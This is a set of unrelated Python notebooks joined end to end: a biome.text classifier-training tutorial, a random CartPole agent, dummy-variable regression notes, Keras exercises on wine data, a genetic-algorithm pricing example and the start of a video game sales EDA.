# In our business name classifier we only want to include words with a general meaning to our word feature vocabulary (like "Computer" or "Autohaus", for example), and want to exclude specific names that will not help to generally classify the kind of business.
# This can be achieved by including only the most frequent words in our training set via the `min_count` argument. For a complete list of available arguments see the [VocabularyConfiguration API](https://www.recogn.ai/biome-text/master/api/biome/text/configuration.html#vocabularyconfiguration).
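# Conceptually, the `min_count` filter keeps only tokens above a frequency threshold. A stdlib sketch of the idea (not biome.text's actual implementation; the helper name is hypothetical):

```python
from collections import Counter

def build_word_vocab(tokens, min_count=20):
    # Keep only tokens occurring at least min_count times in the training data.
    counts = Counter(tokens)
    return {tok for tok, c in counts.items() if c >= min_count}
```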
vocab_config = VocabularyConfiguration(min_count={WordFeatures.namespace: 20})
# ## Configure the trainer
#
# As a next step we have to configure the [`Trainer`](https://www.recogn.ai/biome-text/master/api/biome/text/trainer.html), which is essentially a light wrapper around the amazing [Pytorch Lightning Trainer](https://pytorch-lightning.readthedocs.io/en/latest/common/trainer.html).
#
# The default trainer has sensible defaults and should work alright for most of your cases.
# In this tutorial, however, we want to tune a bit the learning rate and limit the training time to three epochs only.
# We also want to modify the monitored validation metric (by default it is the `validation_loss`) that is used to rank the checkpoints, as well as for the early stopping mechanism and to load the best model weights at the end of the training.
# For a complete list of available arguments see the [TrainerConfiguration API](https://www.recogn.ai/biome-text/master/api/biome/text/configuration.html#trainerconfiguration).
#
# ::: tip Tip
#
# By default we will use a CUDA device if one is available. If you prefer not to use it, just set `gpus=0` in the `TrainerConfiguration`.
#
# :::
#
# ::: tip Tip
#
# The default [WandB](https://wandb.ai/site) logger will log the runs to the "biome" project.
# You can easily change this by setting the `WANDB_PROJECT` env variable:
# ```python
# import os
# os.environ["WANDB_PROJECT"] = "my_project"
# ```
#
# :::
trainer_config = TrainerConfiguration(
optimizer={
"type": "adam",
"lr": 0.01,
},
max_epochs=3,
monitor="validation_accuracy",
monitor_mode="max"
)
# ## Train your model
#
# Now we have everything ready to start the training of our model:
# - training data set
# - pipeline
# - trainer configuration
#
# In a first step we have to create a `Trainer` instance and pass in the pipeline, the training/validation data, the trainer configuration and our vocabulary configuration.
# This will load the data into memory (unless you specify `lazy=True`) and build the vocabulary.
trainer = Trainer(
pipeline=pl,
train_dataset=train_ds,
valid_dataset=valid_ds,
trainer_config=trainer_config,
vocab_config=vocab_config,
)
# In a second step we simply have to call the `Trainer.fit()` method to start the training.
# By default, at the end of the training the trained pipeline and the training metrics will be saved in a folder called `output`.
# The trained pipeline is saved as a `model.tar.gz` file that contains the pipeline configuration, the model weights and the vocabulary.
# The metrics are saved to a `metrics.json` file.
#
# During the training the `Trainer` will also create a logging folder called `training_logs` by default.
# You can modify this path via the `default_root_dir` option in your `TrainerConfiguration`, that also supports remote addresses such as s3 or hdfs.
# This logging folder contains all your checkpoints and logged metrics, like the ones logged for [TensorBoard](https://www.tensorflow.org/tensorboard/) for example.
trainer.fit()
# After 3 epochs we achieve a validation accuracy of about 0.91.
# The validation loss seems to be decreasing further, though, so we could probably train the model for a few more epochs without overfitting the training data.
# For this we could simply reinitialize the `Trainer` and call `Trainer.fit(exist_ok=True)` again.
#
# ::: tip Tip
#
# If for some reason the training gets interrupted, you can continue from the last saved checkpoint by setting the `resume_from_checkpoint` option in the `TrainerConfiguration`.
#
# :::
#
# ::: tip Tip
#
# If you receive warnings about the data loader being a bottleneck, try to increase the `num_workers_for_dataloader` parameter in the `TrainerConfiguration` (up to the number of cpus on your machine).
#
# :::
# ## Make your first predictions
# Now that we trained our model we can go on to make our first predictions.
# We provide the input expected by our `TaskHead` of the model to the `Pipeline.predict()` method.
# In our case it is a `TextClassification` head that classifies a `text` input:
# + nbreg={"diff_ignore": ["/outputs/*"]}
pl.predict(text="Autohaus biome.text")
# -
# The output of the `Pipeline.predict()` method is a dictionary with a `labels` and `probabilities` key containing a list of labels and their corresponding probabilities, ordered from most to less likely.
# ::: tip Tip
#
# When configuring the pipeline in the first place, we recommend to check that it is correctly setup by using the `predict` method.
# Since the pipeline is still not trained at that moment, the predictions will be arbitrary.
#
# :::
# We can also load the trained pipeline from the training output. This is useful in case you trained the pipeline in some earlier session, and want to continue your work with the inference steps:
pl_trained = Pipeline.from_pretrained("output/model.tar.gz")
# + [markdown] pycharm={"name": "#%% md\n"}
#
|
docs/docs/documentation/tutorials/1-Training_a_text_classifier.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import gym
import numpy as np
gym.__version__
# +
RUNS = 1000
steps = list()
rewards = list()
for i in range(RUNS):
env = gym.make("CartPole-v0")
total_reward = 0.0
total_steps = 0
obs = env.reset()
while True:
action = env.action_space.sample()
obs, reward, done, _ = env.step(action)
total_reward += reward
total_steps += 1
if done:
break
steps.append(total_steps)
rewards.append(total_reward)
#print("[%d/%d]\tEpisode done in %d steps, total reward %.2f" % (i+1, RUNS, total_steps, total_reward))
print("Average steps: %d\nAverage reward: %.2f" % (np.mean(steps), np.mean(rewards)))
# -
|
ReinforcementLearning/Cartpole - random.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import scipy as sp
import scipy.stats
import statsmodels.api as sm
# # <font face="gotham" color="purple"> ANOVA </font>
# If you have studied statistics, you certainly know the famous **Analysis of Variance** (ANOVA), you can skip this section, but if you haven't, read on.
#
# Simply speaking, ANOVA is a technique for comparing the means of multiple $(\geq 3)$ populations; the name derives from the way the calculations are performed.
#
# For example, the typical hypotheses of ANOVA are
# $$
# H_0:\quad \mu_1=\mu_2=\mu_3=\cdots=\mu_n\\
# H_1:\quad \text{At least two means differ}
# $$
# In order to construct the $F$-statistic, we need to introduce two more statistics. The first one is the **Mean Square for Treatments** (MST), where $\bar{\bar{x}}$ is the grand mean, $\bar{x}_i$ is the sample mean of sample $i$, and $n_i$ is the number of observations in sample $i$
# $$
# MST=\frac{SST}{k-1},\qquad\text{where } SST=\sum_{i=1}^kn_i(\bar{x}_i-\bar{\bar{x}})^2
# $$
# And the second one is the **Mean Square for Error** (MSE), where $s_i^2$ is the sample variance of sample $i$
# $$
# MSE=\frac{SSE}{n-k},\qquad\text{where } SSE =(n_1-1)s_1^2+(n_2-1)s_2^2+\cdots+(n_k-1)s_k^2
# $$
# Join them together, an $F$-statistic is constructed
# $$
# F=\frac{MST}{MSE}
# $$
# If the $F$-statistic is larger than the critical value at its corresponding degrees of freedom, we reject the null hypothesis.
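# The formulas above can be checked with a small worked example (hypothetical numbers, stdlib only):

```python
# Three samples with means 6, 9 and 7; grand mean 66/9.
samples = [[5.0, 6.0, 7.0], [8.0, 9.0, 10.0], [5.0, 7.0, 9.0]]
k = len(samples)                    # number of populations
n = sum(len(s) for s in samples)    # total number of observations

grand_mean = sum(sum(s) for s in samples) / n
sst = sum(len(s) * (sum(s) / len(s) - grand_mean) ** 2 for s in samples)
mst = sst / (k - 1)                 # Mean Square for Treatments

def sample_var(s):
    m = sum(s) / len(s)
    return sum((x - m) ** 2 for x in s) / (len(s) - 1)

sse = sum((len(s) - 1) * sample_var(s) for s in samples)
mse = sse / (n - k)                 # Mean Square for Error
F = mst / mse                       # here MST = 7, MSE = 2, so F = 3.5
print(F)
```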
# # <font face="gotham" color="purple"> Dummy Variable </font>
# Here's a dataset with dummy variables, which are either $1$ or $0$.
df = pd.read_excel('Basic_Econometrics_practice_data.xlsx', sheet_name = 'Hight_ANOVA')
df
# The dataset has five columns: the first column, $Height$, is a sample of $88$ male heights; the other columns are dummy variables indicating a qualitative feature, here the nationality.
#
# There are $4$ countries in the sample (Japan, the Netherlands, Denmark and Finland), but only $3$ dummies in the data set. This is to avoid _perfect multicollinearity_, also called the **dummy variable trap**: the constant term is a perfect linear combination of the four dummy variables.
#
# If we use a model with only dummy variables as independent variables, we are basically regressing an ANOVA model, i.e.
# $$
# Y_{i}=\beta_{1}+\beta_{2} D_{2 i}+\beta_{3} D_{3 i}+\beta_{4} D_{4 i}+u_{i}
# $$
# where $Y_i =$ the male height, $D_{2i}=1$ if the male is from Netherlands, $D_{3i}=1$ if the male is from Denmark and $D_{4i}=1$ if the male is from Finland. Japan doesn't have a dummy variable, so we are using it as reference, which will be clearer later.
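# The trap can be illustrated in a few lines (hypothetical data, stdlib only):

```python
# With one dummy per country, the dummy columns of every observation sum
# to 1, i.e. exactly to the constant column: perfect multicollinearity.
countries = ["JP", "NL", "DM", "FI", "NL", "JP"]
levels = ["JP", "NL", "DM", "FI"]
full_dummies = [[1 if c == lvl else 0 for lvl in levels] for c in countries]
assert all(sum(row) == 1 for row in full_dummies)

# Dropping one category (Japan) removes the collinearity; Japan becomes
# the reference category captured by the intercept.
reduced = [row[1:] for row in full_dummies]
```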
#
# Now we run the regression and print the result. And how do we interpret the estimated coefficients?
# +
X = df[[ 'NL_dummpy', 'DM_dummpy', 'FI_dummy']]
Y = df['Height']
X = sm.add_constant(X) # adding a constant
model = sm.OLS(Y, X).fit()
print_model = model.summary()
print(print_model)
# -
# First, all the $p$-value are significantly small, so our estimation is valid. Then we examine the coefficients one by one.
#
# The estimated constant $b_1 = 163.03$ is the mean height of Japanese male. The mean of Dutch male height is $b_1+b_2 = 163.03+17.71=180.74$, the mean of Danish male height is $b_1+b_3=163.03+12.21=175.24$, the mean of Finnish male height is $b_1+b_4=163.03+12.85=175.88$.
#
# As you can see, the Japanese male height is used as a _reference_, also called the _base category_; the rest are added upon it.
# This regression has the same effect as an ANOVA test: all dummy coefficients are significant and so is the $F$-statistic, which means we reject the null hypothesis that all countries' male heights are the same.
# # <font face="gotham" color="purple"> The ANCOVA Models </font>
# The example in the last section has only dummies in the independent variables, which is rare in practice. The more common situation is that independent variables have both quantitative and qualitative/dummy variables, and this is what we will do in this section.
#
# Models with both quantitative and qualitative variables are called **analysis of covariance** (ANCOVA) models. We have another dataset that also contains each individual's parents' heights.
# +
df = pd.read_excel('Basic_Econometrics_practice_data.xlsx', sheet_name = 'Hight_ANCOVA')
X = df[['Height of Father', 'Height of Mother','NL_dummy', 'DM_dummy', 'FI_dummy']]
Y = df['Height']
X = sm.add_constant(X) # adding a constant
model = sm.OLS(Y, X).fit()
print_model = model.summary()
print(print_model)
# -
# In order to interpret the results, let's type the estimated model here
# $$
# \hat{Y}= 27.87+.33 X_{f} + .5 X_{m} + 5.36 D_{NL} + 2.90 D_{DM} + 1.02 D_{FI}
# $$
# where $X_{f}$ and $X_{m}$ are father's and mother's heights, $D$'s are dummy variables representing each country.
# This is actually a function that predicts a male's height from his parents' heights. For instance, if we set $D_{NL} = D_{DM} = D_{FI} = 0$, the height function for Japanese males is
# $$
# \hat{Y}= 27.87+.33 X_{f} + .5 X_{m}
# $$
# Or the function of Dutch male height with $D_{NL} = 1$ and $ D_{DM}= D_{FI}=0$
# $$
# \hat{Y}= 27.87+.33 X_{f} + .5 X_{m} + 5.36
# $$
# With these results, we can define Python functions to predict male height
def jp_height(fh, mh):
return 27.87 + fh*.33 + mh*.5
def nl_height(fh, mh):
return 27.87 + fh*.33 + mh*.5 + 5.36
# A function to predict a Japanese male's height
jp_height(175, 170)
# And function to predict a Dutch male's height
nl_height(185, 185)
# # <font face="gotham" color="purple"> Slope Dummy Variables </font>
# What we have discussed above are all **intercept dummy variables**, which means the dummy variable only changes the intercept term; however, dummies can be imposed on slope coefficients too.
#
# Back to the height example, what if we suspect that parents' height in NL could have more marginal effect on their sons' height, i.e. the model is
# $$
# Y= \beta_1 + \beta_2D_{NL} + (\beta_3+ \beta_4D_{NL})X_{f} + (\beta_5+ \beta_6D_{NL})X_{m}+u
# $$
# Rewrite for estimation purpose
# $$
# Y= \beta_1 + \beta_2D_{NL} + \beta_3 X_f + \beta_4 D_{NL}X_f + \beta_5X_m + \beta_6 D_{NL}X_m+u
# $$
# Take a look at our data, we need to reconstruct it
df.head()
# Drop the dummies of Denmark and Finland
df_NL = df.drop(['DM_dummy', 'FI_dummy'], axis=1); df_NL.head()
# Also create the columns $D_{NL} \cdot X_f$ and $D_{NL}\cdot X_m$, then construct the independent variable matrix and the dependent variable
df_NL['D_NL_Xf'] = df_NL['Height of Father']*df_NL['NL_dummy']
df_NL['D_NL_Xm'] = df_NL['Height of Mother']*df_NL['NL_dummy']
X = df_NL[['NL_dummy', 'Height of Father', 'D_NL_Xf', 'Height of Mother', 'D_NL_Xm']]
Y = df['Height']
# +
X = sm.add_constant(X) # adding a constant
model = sm.OLS(Y, X).fit()
print_model = model.summary()
print(print_model)
# -
# Here's the estimated regression model
# $$
# \hat{Y}= 11.7747 + 120.9563D_{NL} + 0.3457 X_f - 0.0946 D_{NL}X_f + 0.5903X_m -0.5746 D_{NL}X_m
# $$
# If $D_{NL}=1$ then
# $$
# \hat{Y}= 132.731+0.2511X_f +0.0157X_m
# $$
# Again, we define a Python function to predict Dutch male height based on their parents' height
def nl_height_marginal(fh, mh):
return 132.731 + fh*.2511 + mh*0.0157
nl_height_marginal(185, 180)
# The prediction seems quite logical.
#
# However, as you can see from the results, the hypothesis tests reject our theory that Dutch parents have a different marginal effect on their sons' height, i.e. the coefficients of $D_{NL} \cdot X_f$ and $D_{NL}\cdot X_m$ fail to reject the null hypothesis at the $5\%$ significance level.
|
4. Dummy Variable.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Gradient Descent
import numpy as np
import pandas as pd
# %matplotlib inline
import matplotlib.pyplot as plt
# ### Exercise 1
#
# You've just been hired at a wine company and they would like you to help them build a model that predicts the quality of their wine based on several measurements. They give you a dataset of wine measurements.
#
# - Load the ../data/wines.csv into Pandas
# - Use the column called "Class" as target
# - Check how many classes are there in target, and if necessary use dummy columns for a multi-class classification
# - Use all the other columns as features, check their range and distribution (using seaborn pairplot)
# - Rescale all the features using either MinMaxScaler or StandardScaler
# - Build a deep model with at least 1 hidden layer to classify the data
# - Choose the cost function, what will you use? Mean Squared Error? Binary Cross-Entropy? Categorical Cross-Entropy?
# - Choose an optimizer
# - Choose a value for the learning rate, you may want to try with several values
# - Choose a batch size
# - Train your model on all the data using a `validation_split=0.2`. Can you converge to 100% validation accuracy?
# - What's the minimum number of epochs to converge?
# - Repeat the training several times to verify how stable your results are
df = pd.read_csv('../data/wines.csv')
df.head()
y = df['Class']
y.value_counts()
y_cat = pd.get_dummies(y)
y_cat.head()
X = df.drop('Class', axis=1)
X.shape
import seaborn as sns
sns.pairplot(df, hue='Class')
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
Xsc = sc.fit_transform(X)
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.optimizers import SGD, Adam, Adadelta, RMSprop
import tensorflow.keras.backend as K
# +
K.clear_session()
model = Sequential()
model.add(Dense(5, input_shape=(13,),
kernel_initializer='he_normal',
activation='relu'))
model.add(Dense(3, activation='softmax'))
model.compile(RMSprop(learning_rate=0.1),
'categorical_crossentropy',
metrics=['accuracy'])
model.fit(Xsc, y_cat.values,
batch_size=8,
epochs=10,
verbose=1,
validation_split=0.2)
# -
# ### Exercise 2
#
# Since this dataset has 13 features we can only visualize pairs of features like we did in the Paired plot. We could however exploit the fact that a neural network is a function to extract 2 high level features to represent our data.
#
# - Build a deep fully connected network with the following structure:
# - Layer 1: 8 nodes
# - Layer 2: 5 nodes
# - Layer 3: 2 nodes
# - Output : 3 nodes
# - Choose activation functions, initializations, optimizer and learning rate so that it converges to 100% accuracy within 20 epochs (not easy)
# - Remember to train the model on the scaled data
# - Define a Feature Function like we did above between the input of the 1st layer and the output of the 3rd layer
# - Calculate the features and plot them on a 2-dimensional scatter plot
# - Can we distinguish the 3 classes well?
#
# +
K.clear_session()
model = Sequential()
model.add(Dense(8, input_shape=(13,),
kernel_initializer='he_normal', activation='tanh'))
model.add(Dense(5, kernel_initializer='he_normal', activation='tanh'))
model.add(Dense(2, kernel_initializer='he_normal', activation='tanh'))
model.add(Dense(3, activation='softmax'))
model.compile(RMSprop(learning_rate=0.05),
'categorical_crossentropy',
metrics=['accuracy'])
model.fit(Xsc, y_cat.values,
batch_size=16,
epochs=20,
verbose=1)
# -
model.summary()
inp = model.layers[0].input
out = model.layers[2].output
features_function = K.function([inp], [out])
features = features_function([Xsc])[0]
features.shape
plt.scatter(features[:, 0], features[:, 1], c=y)
# ### Exercise 3
#
# Keras functional API. So far we've always used the Sequential model API in Keras. However, Keras also offers a Functional API, which is much more powerful. You can find its [documentation here](https://keras.io/getting-started/functional-api-guide/). Let's see how we can leverage it.
#
# - define an input layer called `inputs`
# - define two hidden layers as before, one with 8 nodes, one with 5 nodes
# - define a `second_to_last` layer with 2 nodes
# - define an output layer with 3 nodes
# - create a model that connect input and output
# - train it and make sure that it converges
# - define a function between inputs and second_to_last layer
# - recalculate the features and plot them
from tensorflow.keras.layers import Input
from tensorflow.keras.models import Model
# +
K.clear_session()
inputs = Input(shape=(13,))
x = Dense(8, kernel_initializer='he_normal', activation='tanh')(inputs)
x = Dense(5, kernel_initializer='he_normal', activation='tanh')(x)
second_to_last = Dense(2, kernel_initializer='he_normal',
activation='tanh')(x)
outputs = Dense(3, activation='softmax')(second_to_last)
model = Model(inputs=inputs, outputs=outputs)
model.compile(RMSprop(learning_rate=0.05),
'categorical_crossentropy',
metrics=['accuracy'])
model.fit(Xsc, y_cat.values, batch_size=16, epochs=20, verbose=1)
# -
features_function = K.function([inputs], [second_to_last])
features = features_function([Xsc])[0]
plt.scatter(features[:, 0], features[:, 1], c=y)
# ## Exercise 4
#
# Keras offers the possibility to call a function at each epoch. These are Callbacks, and their [documentation is here](https://keras.io/callbacks/). Callbacks allow us to add some neat functionality. In this exercise we'll explore a few of them.
#
# - Split the data into train and test sets with a test_size = 0.3 and random_state=42
# - Reset and recompile your model
# - train the model on the train data using `validation_data=(X_test, y_test)`
# - Use the `EarlyStopping` callback to stop your training if the `val_loss` doesn't improve
# - Use the `ModelCheckpoint` callback to save the trained model to disk once training is finished
# - Use the `TensorBoard` callback to output your training information to a `/tmp/` subdirectory
# - Watch the next video for an overview of tensorboard
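# The early-stopping rule itself is easy to reason about. Below is a dependency-free sketch of the `patience` logic (a hypothetical minimal version for intuition, not the actual Keras implementation):

```python
def early_stop(val_losses, patience=1, min_delta=0.0):
    """Return the epoch index at which training would stop, or None."""
    best, wait = float('inf'), 0
    for epoch, loss in enumerate(val_losses):
        if loss < best - min_delta:
            # validation loss improved: reset the patience counter
            best, wait = loss, 0
        else:
            wait += 1
            if wait > patience:
                return epoch
    return None

print(early_stop([1.0, 0.8, 0.81, 0.82, 0.5]))  # stops at epoch 3
```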
from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, TensorBoard
checkpointer = ModelCheckpoint(filepath="/tmp/udemy/weights.hdf5",
verbose=1, save_best_only=True)
earlystopper = EarlyStopping(monitor='val_loss', min_delta=0,
patience=1, verbose=1, mode='auto')
tensorboard = TensorBoard(log_dir='/tmp/udemy/tensorboard/')
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(Xsc, y_cat.values,
test_size=0.3,
random_state=42)
# +
K.clear_session()
inputs = Input(shape=(13,))
x = Dense(8, kernel_initializer='he_normal', activation='tanh')(inputs)
x = Dense(5, kernel_initializer='he_normal', activation='tanh')(x)
second_to_last = Dense(2, kernel_initializer='he_normal',
activation='tanh')(x)
outputs = Dense(3, activation='softmax')(second_to_last)
model = Model(inputs=inputs, outputs=outputs)
model.compile(RMSprop(learning_rate=0.05), 'categorical_crossentropy',
metrics=['accuracy'])
model.fit(X_train, y_train, batch_size=32,
epochs=20, verbose=2,
validation_data=(X_test, y_test),
callbacks=[checkpointer, earlystopper, tensorboard])
# -
# Run Tensorboard with the command:
#
# tensorboard --logdir /tmp/udemy/tensorboard/
#
# and open your browser at http://localhost:6006
|
solutions/5 Gradient Descent Exercises Solution.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Code source: Yarpiz (https://yarpiz.com/)
# real-valued GA
import numpy as np
from ypstruct import structure
import matplotlib.pyplot as plt
# run Genetic Algorithm
def run(problem, params):
# Problem Information
costfunc = problem.costfunc
nvar = problem.nvar
varmin = problem.varmin
varmax = problem.varmax
# Parameters
maxit = params.maxit
npop = params.npop
beta = params.beta
pc = params.pc
nc = int(np.round(pc*npop/2)*2)
gamma = params.gamma
mu = params.mu
sigma = params.sigma
# Empty Individual Template
empty_individual = structure()
empty_individual.position = None
empty_individual.cost = None
# Best Solution Ever Found
bestsol = empty_individual.deepcopy()
bestsol.cost = np.inf
# Initialize Population
pop = empty_individual.repeat(npop)
for i in range(npop):
pop[i].position = np.random.uniform(varmin, varmax, nvar)
pop[i].cost = costfunc(pop[i].position)
if pop[i].cost < bestsol.cost:
bestsol = pop[i].deepcopy()
# Best Cost of Iterations
bestcost = np.empty(maxit)
# Main Loop
for it in range(maxit):
costs = np.array([x.cost for x in pop])
avg_cost = np.mean(costs)
if avg_cost != 0:
costs = costs/avg_cost
probs = np.exp(-beta*costs)
popc = []
for _ in range(nc//2):
# Select Parents
#q = np.random.permutation(npop)
#p1 = pop[q[0]]
#p2 = pop[q[1]]
# Perform Roulette Wheel Selection
p1 = pop[roulette_wheel_selection(probs)]
p2 = pop[roulette_wheel_selection(probs)]
# Perform Crossover
c1, c2 = crossover(p1, p2, gamma)
# Perform Mutation
c1 = mutate(c1, mu, sigma)
c2 = mutate(c2, mu, sigma)
# Apply Bounds
apply_bound(c1, varmin, varmax)
apply_bound(c2, varmin, varmax)
# Evaluate First Offspring
c1.cost = costfunc(c1.position)
if c1.cost < bestsol.cost:
bestsol = c1.deepcopy()
# Evaluate Second Offspring
c2.cost = costfunc(c2.position)
if c2.cost < bestsol.cost:
bestsol = c2.deepcopy()
# Add Offsprings to popc
popc.append(c1)
popc.append(c2)
# Merge, Sort and Select
pop += popc
pop = sorted(pop, key=lambda x: x.cost)
pop = pop[0:npop]
# Store Best Cost
bestcost[it] = bestsol.cost
# Show Iteration Information
print("Iteration {}: Best Cost = {}".format(it, bestcost[it]))
# Output
out = structure()
out.pop = pop
out.bestsol = bestsol
print("Best solution: ", bestsol.position)
out.bestcost = bestcost
return out
# perform single-point crossover
def crossover(p1, p2, gamma=0.1):
c1 = p1.deepcopy()
c2 = p1.deepcopy()
alpha = np.random.uniform(-gamma, 1+gamma, *c1.position.shape)
c1.position = alpha*p1.position + (1-alpha)*p2.position
c2.position = alpha*p2.position + (1-alpha)*p1.position
return c1, c2
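# A self-contained check of the blend (arithmetic) crossover above, with illustrative parent values: for any alpha vector, each pair of children mirrors the parents around their midpoint.

```python
import numpy as np

np.random.seed(1)
gamma = 0.1
p1 = np.array([1.0, 2.0, 3.0])
p2 = np.array([4.0, 5.0, 6.0])
# same blend rule as crossover() above
alpha = np.random.uniform(-gamma, 1 + gamma, p1.shape)
c1 = alpha * p1 + (1 - alpha) * p2
c2 = alpha * p2 + (1 - alpha) * p1
# the children always sum to the parents, element-wise
print(np.allclose(c1 + c2, p1 + p2))
```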
# apply mutation
def mutate(x, mu, sigma):
y = x.deepcopy()
flag = np.random.rand(*x.position.shape) <= mu
ind = np.argwhere(flag)
y.position[ind] += sigma*np.random.randn(*ind.shape)
return y
# apply boundary constraints
def apply_bound(x, varmin, varmax):
x.position = np.maximum(x.position, varmin)
x.position = np.minimum(x.position, varmax)
# roulette wheel selection
def roulette_wheel_selection(p):
c = np.cumsum(p)
r = sum(p)*np.random.rand()
ind = np.argwhere(r <= c)
return ind[0][0]
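# A quick standalone sanity check of the roulette-wheel logic above (the function is repeated here so the snippet runs on its own): an index holding most of the probability mass should be drawn most often.

```python
import numpy as np

def roulette_wheel_selection(p):
    # cumulative sum + uniform draw, as in the cell above
    c = np.cumsum(p)
    r = sum(p) * np.random.rand()
    return np.argwhere(r <= c)[0][0]

np.random.seed(0)
p = np.array([0.1, 0.1, 0.8])
picks = [roulette_wheel_selection(p) for _ in range(1000)]
print(picks.count(2))  # index 2 holds 80% of the mass, so it should dominate
```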
# +
# Fitness function: profit(X) = -200*X**2 + 92000*X - 8400000, which peaks at X = 230.
# run() minimizes the cost, so return the negated profit.
def bike_pricing(X):
    return -sum([-200*(X**2), 92000*X, -8400000])
# Problem Definition
problem = structure()
problem.costfunc = bike_pricing
problem.nvar = 1
problem.varmin = [50]
problem.varmax = [350]
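# An analytic sanity check (not part of the original notebook): the quadratic profit -200*X**2 + 92000*X - 8400000 peaks at the vertex X = -b/(2a), which conveniently lies inside the [50, 350] bounds set above, so the GA result can be compared against it.

```python
# Vertex of profit(X) = a*X**2 + b*X + c with a = -200, b = 92000
a, b = -200, 92000
x_opt = -b / (2 * a)
profit_opt = a * x_opt**2 + b * x_opt - 8400000
print(x_opt, profit_opt)  # 230.0 2180000.0
```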
# +
# Solver
# GA Parameters
params = structure()
params.maxit = 200
params.npop = 5
params.beta = 1
params.pc = 1
params.gamma = 0.1
params.mu = 0.01
params.sigma = 0.1
# Run GA
out = run(problem, params)
# -
# Results
plt.plot(out.bestcost)
# plt.semilogy(out.bestcost)
plt.xlim(0, params.maxit)
plt.xlabel('Iterations')
plt.ylabel('Best Cost')
plt.title('Genetic Algorithm (GA)')
plt.grid(True)
plt.show()
|
bike_pricing_real_valued_GA.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/Vinicius-L-R-Matos/-Repositorio-DS/blob/master/_notebook/2021_11_20_EDA_Venda_de_jogos.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="LBnGa6DR5HX6"
# # EDA - Video Game Sales
# A contribution to the analysis of video game sales
#
#
# Plotting library documentation:
#
# - [Matplotlib](https://matplotlib.org/stable/tutorials/index.html#introductory)
# - [Seaborn](https://seaborn.pydata.org/tutorial.html)
#
# EDA dataset options:
#
# [Predict Sales](https://www.kaggle.com/c/competitive-data-science-predict-future-sales/data?select=sales_train.csv)
#
# [PUGB Finish Predict](https://www.kaggle.com/c/pubg-finish-placement-prediction/data)
#
# [Predict Price](https://www.kaggle.com/c/mercari-price-suggestion-challenge/data?select=train.tsv.7z)
#
# [Netflix Dataset](https://www.kaggle.com/shivamb/netflix-shows)
#
#
# [Predict Imdb Rate](https://www.kaggle.com/stefanoleone992/imdb-extensive-dataset?select=IMDb+ratings.csv)
#
# # Chosen Challenge
#
# [Video Game Sales](https://www.kaggle.com/gregorut/videogamesales)
#
#
# + [markdown] id="NHEQ6klz9Gpy"
# # Possible Questions
#
# - Which game sold the most per region/genre/platform? OK
# - Do children's games sell more than adult ones? Does the country's culture also have an influence? - Look for a dataset with age ratings to join on
# - Do exclusive games sell more? OK
# - Competition among exclusives (the main console manufacturers)?
# - Which publisher sells the most and has the most games?
#   Sales per game? OK
# - Do NA sales indicate the behavior of the rest of the world? OK
# - Are there years with more game sales? OK
# - Genre by region? OK
#
#
# + id="ByqaPu9CD1Gr" colab={"base_uri": "https://localhost:8080/"} outputId="1af7dd7d-0ace-4d27-ab13-54d31bd89e81"
# !pip install -U seaborn
# + id="ZhVNYWkqCDCE"
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# + id="fbbtZ37ayHCg"
## ref - https://pythonguides.com/what-is-matplotlib-inline/
# %matplotlib inline
# + id="56gTWZmuqqyi"
#statistics lib
from scipy import stats
# + id="ivkbP69p3CCm"
df = pd.read_csv('vgsales.csv')
# + id="oG0RQi7T3Nlw"
## Inspect
# + colab={"base_uri": "https://localhost:8080/"} id="lIHDI1aJ3QZF" outputId="4fff8174-b593-421b-9092-424c5a7659e6"
df.shape
# + colab={"base_uri": "https://localhost:8080/"} id="LIX4vt8P3apO" outputId="7af80ac7-cdd0-43b6-d67c-6dea1d341b45"
df.info()
# + colab={"base_uri": "https://localhost:8080/", "height": 206} id="wOAO5Y4f3egd" outputId="293da600-fcd9-45c9-ae51-5bae7b5a5f69"
df.head()
# + colab={"base_uri": "https://localhost:8080/"} id="-8gzK-It34TT" outputId="3a82dfe3-2786-4d4a-d62b-60f36d1b3237"
df.isna().sum()/df.shape[0]
# + colab={"base_uri": "https://localhost:8080/"} id="h2RhcmPs5-96" outputId="c6243d9a-0a1b-40f8-a146-3497f007f100"
df.columns.str.lower()
# + id="hRamjCWv534I"
columns_renamed = {
'Rank': 'rank',
'Name': 'name',
'Platform': 'platform',
'Year': 'year',
'Genre': 'genre',
'Publisher': 'publisher',
'NA_Sales': 'na_sales',
'EU_Sales': 'eu_sales',
'JP_Sales': 'jp_sales',
'Other_Sales': 'other_sales',
'Global_Sales': 'global_sales'
}
df.rename(columns=columns_renamed, inplace=True)
# + colab={"base_uri": "https://localhost:8080/", "height": 424} id="zMozQnVD4Pyv" outputId="f034d250-b29a-4413-960b-c32d45598728"
df[df.year.isna()]
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="lUt1HMS451hW" outputId="23ca9a54-4bbc-42aa-f4bc-ecca9970dcda"
df[df.publisher.isna()]
# + id="pcvl2cSz5wXa"
df.dropna(inplace=True)
# + id="r0NFXhTa3mAl"
df.year =df.year.astype(int)
